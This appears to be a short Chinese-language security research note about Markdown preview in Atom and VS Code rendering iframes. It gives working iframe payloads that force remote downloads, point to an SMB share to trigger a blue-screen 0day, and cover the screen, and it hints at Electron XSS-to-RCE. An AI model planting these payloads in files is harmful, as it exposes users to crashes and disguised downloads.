Atom / VSCode預覽個人markdown藍屏的一種情景可能性

前言

默認下markdown preview對iframe/embed/svg/p等標籤是解析的，對img等標籤是不解析的
可是使用正常的http://是沒法引入外部資源展現的。以下圖

場景

測試

<!-- 加載正常的html上js代碼是沒法執行的，以下圖 -->
<iframe/src=http:\\tmxk.org/csrf>

任意文件下載

<!-- 提示用戶保存文件，文件爲.css文件，或者改個誘惑型好比預覽插件等，以下圖 -->
<iframe/src=http:\\tmxk.org/.css>

結合SMBV3 0day 藍屏

<!-- 模擬smb服務，被動觸發 -->
<iframe/src=\\1.1.1.1\>

其餘小記猜測

visual code UA:
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Code/1.9.1 Chrome/53.0.2785.143 Electron/1.4.6 Safari/537.36

Atom UA:
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Atom/1.7.2 Chrome/47.0.2526.110 Electron/0.36.8 Safari/537.36

<p style="position:fixed; top:0; left:0;z-index:99999; width:100%; height:100%;background:#000;color:#fff;padding-top:30%;text-align:center;font-size:64px;">23333</p>

END

根據以前爆出的vscode的命令執行，咱們是否也能夠讓atom作到呢？
能夠仔細看下Electron與atom相關的代碼，有驚喜。
注：上面的測試代碼放在`之間進行預覽觸發，通用vscode與atom

20170808更新

能玩的仍是挺多的，mark下
https://mp.weixin.qq.com/s/DgjJ6uKtuUPFQhgztL69RQ  Electron hack —— 跨平臺 XSS  
https://blog.doyensec.com/2017/08/03/electron-framework-security.html  Modern Alchemy: Turning XSS into RCE